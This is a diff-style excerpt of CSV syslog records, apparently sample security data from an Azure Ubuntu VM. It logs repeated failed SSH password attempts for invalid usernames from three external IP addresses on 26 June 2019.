+16786,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:32:06,UbuntuDevEnv,2019-06-26 07:32:05,auth,UbuntuDevEnv,info,Received disconnect from 46.101.149.230 port 46182:11: Bye Bye [preauth],44581,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,46.101.149.2,46182,,
+16787,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:32:27,UbuntuDevEnv,2019-06-26 07:32:26,auth,UbuntuDevEnv,info,Invalid user sublink from 87.101.240.10 port 44378,44660,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sublink,87.101.240.1,44378,,
+16788,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:32:27,UbuntuDevEnv,2019-06-26 07:32:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,44660,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16789,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:32:27,UbuntuDevEnv,2019-06-26 07:32:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=87.101.240.10,44660,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,87.101.240.1,,0,
+16790,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:32:28,UbuntuDevEnv,2019-06-26 07:32:28,auth,UbuntuDevEnv,info,Failed password for invalid user sublink from 87.101.240.10 port 44378 ssh2,44660,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sublink,87.101.240.1,44378,,
+16791,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:32:28,UbuntuDevEnv,2019-06-26 07:32:28,auth,UbuntuDevEnv,info,Disconnected from invalid user sublink 87.101.240.10 port 44378 [preauth],44660,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sublink,87.101.240.1,44378,,
+16792,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:32:28,UbuntuDevEnv,2019-06-26 07:32:28,auth,UbuntuDevEnv,info,Received disconnect from 87.101.240.10 port 44378:11: Bye Bye [preauth],44660,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,87.101.240.1,44378,,
+16793,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:33:25,UbuntuDevEnv,2019-06-26 07:33:24,auth,UbuntuDevEnv,info,Invalid user pc from 206.189.118.156 port 46658,44867,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pc,206.189.118.1,46658,,
+16794,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:33:25,UbuntuDevEnv,2019-06-26 07:33:24,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,44867,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16795,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:33:25,UbuntuDevEnv,2019-06-26 07:33:24,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=206.189.118.156,44867,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,206.189.118.1,,0,
+16796,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:33:27,UbuntuDevEnv,2019-06-26 07:33:27,auth,UbuntuDevEnv,info,Failed password for invalid user pc from 206.189.118.156 port 46658 ssh2,44867,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pc,206.189.118.1,46658,,
+16797,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:33:27,UbuntuDevEnv,2019-06-26 07:33:27,auth,UbuntuDevEnv,info,Disconnected from invalid user pc 206.189.118.156 port 46658 [preauth],44867,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pc,206.189.118.1,46658,,
+16798,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:33:27,UbuntuDevEnv,2019-06-26 07:33:27,auth,UbuntuDevEnv,info,Received disconnect from 206.189.118.156 port 46658:11: Bye Bye [preauth],44867,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,206.189.118.1,46658,,
+16799,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:34:17,UbuntuDevEnv,2019-06-26 07:34:16,auth,UbuntuDevEnv,info,Invalid user subham from 46.101.149.230 port 35076,45046,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,subham,46.101.149.2,35076,,
+16800,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:34:17,UbuntuDevEnv,2019-06-26 07:34:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=46.101.149.230,45046,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,46.101.149.2,,0,
+16801,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:34:17,UbuntuDevEnv,2019-06-26 07:34:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,45046,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16802,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:34:19,UbuntuDevEnv,2019-06-26 07:34:19,auth,UbuntuDevEnv,info,Failed password for invalid user subham from 46.101.149.230 port 35076 ssh2,45046,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,subham,46.101.149.2,35076,,
+16803,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:34:19,UbuntuDevEnv,2019-06-26 07:34:19,auth,UbuntuDevEnv,info,Disconnected from invalid user subham 46.101.149.230 port 35076 [preauth],45046,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,subham,46.101.149.2,35076,,
+16804,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:34:19,UbuntuDevEnv,2019-06-26 07:34:19,auth,UbuntuDevEnv,info,Received disconnect from 46.101.149.230 port 35076:11: Bye Bye [preauth],45046,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,46.101.149.2,35076,,
+16805,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:34:30,UbuntuDevEnv,2019-06-26 07:34:29,auth,UbuntuDevEnv,info,Invalid user apache from 87.101.240.10 port 33400,45091,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,apache,87.101.240.1,33400,,
+16806,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:34:30,UbuntuDevEnv,2019-06-26 07:34:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=87.101.240.10,45091,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,87.101.240.1,,0,
+16807,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:34:30,UbuntuDevEnv,2019-06-26 07:34:29,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,45091,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16808,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:34:32,UbuntuDevEnv,2019-06-26 07:34:31,auth,UbuntuDevEnv,info,Failed password for invalid user apache from 87.101.240.10 port 33400 ssh2,45091,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,apache,87.101.240.1,33400,,
+16809,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:34:32,UbuntuDevEnv,2019-06-26 07:34:31,auth,UbuntuDevEnv,info,Disconnected from invalid user apache 87.101.240.10 port 33400 [preauth],45091,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,apache,87.101.240.1,33400,,
+16810,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:34:32,UbuntuDevEnv,2019-06-26 07:34:31,auth,UbuntuDevEnv,info,Received disconnect from 87.101.240.10 port 33400:11: Bye Bye [preauth],45091,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,87.101.240.1,33400,,
+16811,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:34:56,UbuntuDevEnv,2019-06-26 07:34:56,auth,UbuntuDevEnv,info,Invalid user marlon from 206.189.118.156 port 35876,45184,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,marlon,206.189.118.1,35876,,
+16812,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:34:56,UbuntuDevEnv,2019-06-26 07:34:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,45184,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16813,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:34:56,UbuntuDevEnv,2019-06-26 07:34:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=206.189.118.156,45184,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,206.189.118.1,,0,
+16814,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:34:59,UbuntuDevEnv,2019-06-26 07:34:58,auth,UbuntuDevEnv,info,Failed password for invalid user marlon from 206.189.118.156 port 35876 ssh2,45184,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,marlon,206.189.118.1,35876,,
+16815,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:34:59,UbuntuDevEnv,2019-06-26 07:34:58,auth,UbuntuDevEnv,info,Received disconnect from 206.189.118.156 port 35876:11: Bye Bye [preauth],45184,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,206.189.118.1,35876,,
+16816,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:34:59,UbuntuDevEnv,2019-06-26 07:34:58,auth,UbuntuDevEnv,info,Disconnected from invalid user marlon 206.189.118.156 port 35876 [preauth],45184,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,marlon,206.189.118.1,35876,,
+16817,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:36:24,UbuntuDevEnv,2019-06-26 07:36:23,auth,UbuntuDevEnv,info,Invalid user fog from 46.101.149.230 port 52198,45499,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fog,46.101.149.2,52198,,
+16818,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:36:24,UbuntuDevEnv,2019-06-26 07:36:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,45499,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16819,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:36:24,UbuntuDevEnv,2019-06-26 07:36:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=46.101.149.230,45499,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,46.101.149.2,,0,
+16820,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:36:26,UbuntuDevEnv,2019-06-26 07:36:26,auth,UbuntuDevEnv,info,Invalid user sumit from 206.189.118.156 port 53324,45519,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sumit,206.189.118.1,53324,,
+16821,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:36:26,UbuntuDevEnv,2019-06-26 07:36:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,45519,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16822,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:36:26,UbuntuDevEnv,2019-06-26 07:36:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=206.189.118.156,45519,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,206.189.118.1,,0,
+16823,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:36:26,UbuntuDevEnv,2019-06-26 07:36:26,auth,UbuntuDevEnv,info,Failed password for invalid user fog from 46.101.149.230 port 52198 ssh2,45499,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fog,46.101.149.2,52198,,
+16824,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:36:26,UbuntuDevEnv,2019-06-26 07:36:26,auth,UbuntuDevEnv,info,Disconnected from invalid user fog 46.101.149.230 port 52198 [preauth],45499,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fog,46.101.149.2,52198,,
+16825,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:36:26,UbuntuDevEnv,2019-06-26 07:36:26,auth,UbuntuDevEnv,info,Received disconnect from 46.101.149.230 port 52198:11: Bye Bye [preauth],45499,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,46.101.149.2,52198,,
+16826,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:36:27,UbuntuDevEnv,2019-06-26 07:36:27,auth,UbuntuDevEnv,info,Failed password for invalid user sumit from 206.189.118.156 port 53324 ssh2,45519,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sumit,206.189.118.1,53324,,
+16827,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:36:27,UbuntuDevEnv,2019-06-26 07:36:27,auth,UbuntuDevEnv,info,Received disconnect from 206.189.118.156 port 53324:11: Bye Bye [preauth],45519,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,206.189.118.1,53324,,
+16828,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:36:27,UbuntuDevEnv,2019-06-26 07:36:27,auth,UbuntuDevEnv,info,Disconnected from invalid user sumit 206.189.118.156 port 53324 [preauth],45519,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sumit,206.189.118.1,53324,,
+16829,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:36:32,UbuntuDevEnv,2019-06-26 07:36:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,45535,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16830,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:36:32,UbuntuDevEnv,2019-06-26 07:36:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=87.101.240.10,45535,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,87.101.240.1,,0,
+16831,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:36:32,UbuntuDevEnv,2019-06-26 07:36:31,auth,UbuntuDevEnv,info,Invalid user vps from 87.101.240.10 port 50656,45535,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vps,87.101.240.1,50656,,
+16832,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:36:33,UbuntuDevEnv,2019-06-26 07:36:33,auth,UbuntuDevEnv,info,Failed password for invalid user vps from 87.101.240.10 port 50656 ssh2,45535,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vps,87.101.240.1,50656,,
+16833,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:36:33,UbuntuDevEnv,2019-06-26 07:36:33,auth,UbuntuDevEnv,info,Disconnected from invalid user vps 87.101.240.10 port 50656 [preauth],45535,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vps,87.101.240.1,50656,,
+16834,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:36:33,UbuntuDevEnv,2019-06-26 07:36:33,auth,UbuntuDevEnv,info,Received disconnect from 87.101.240.10 port 50656:11: Bye Bye [preauth],45535,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,87.101.240.1,50656,,
+16835,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:37:57,UbuntuDevEnv,2019-06-26 07:37:56,auth,UbuntuDevEnv,info,Invalid user doku from 206.189.118.156 port 42542,45830,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,doku,206.189.118.1,42542,,
+16836,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:37:57,UbuntuDevEnv,2019-06-26 07:37:57,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,45830,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16837,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:37:57,UbuntuDevEnv,2019-06-26 07:37:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=206.189.118.156,45830,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,206.189.118.1,,0,
+16838,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:37:59,UbuntuDevEnv,2019-06-26 07:37:58,auth,UbuntuDevEnv,info,Failed password for invalid user doku from 206.189.118.156 port 42542 ssh2,45830,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,doku,206.189.118.1,42542,,
+16839,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:37:59,UbuntuDevEnv,2019-06-26 07:37:58,auth,UbuntuDevEnv,info,Disconnected from invalid user doku 206.189.118.156 port 42542 [preauth],45830,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,doku,206.189.118.1,42542,,
+16840,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:37:59,UbuntuDevEnv,2019-06-26 07:37:58,auth,UbuntuDevEnv,info,Received disconnect from 206.189.118.156 port 42542:11: Bye Bye [preauth],45830,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,206.189.118.1,42542,,
+16841,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:38:30,UbuntuDevEnv,2019-06-26 07:38:30,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=46.101.149.230  user=irc,45949,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,irc,46.101.149.2,,0,
+16842,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:38:32,UbuntuDevEnv,2019-06-26 07:38:32,auth,UbuntuDevEnv,info,Invalid user vyatta from 87.101.240.10 port 39684,45957,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vyatta,87.101.240.1,39684,,
+16843,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:38:32,UbuntuDevEnv,2019-06-26 07:38:32,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,45957,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16844,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:38:32,UbuntuDevEnv,2019-06-26 07:38:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=87.101.240.10,45957,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,87.101.240.1,,0,
+16845,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 07:38:33,UbuntuDevEnv,2019-06-26 07:38:32,auth,UbuntuDevEnv,info,Failed password for irc from 46.101.149.230 port 41088 ssh2,45949,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,46.101.149.2,41088,,
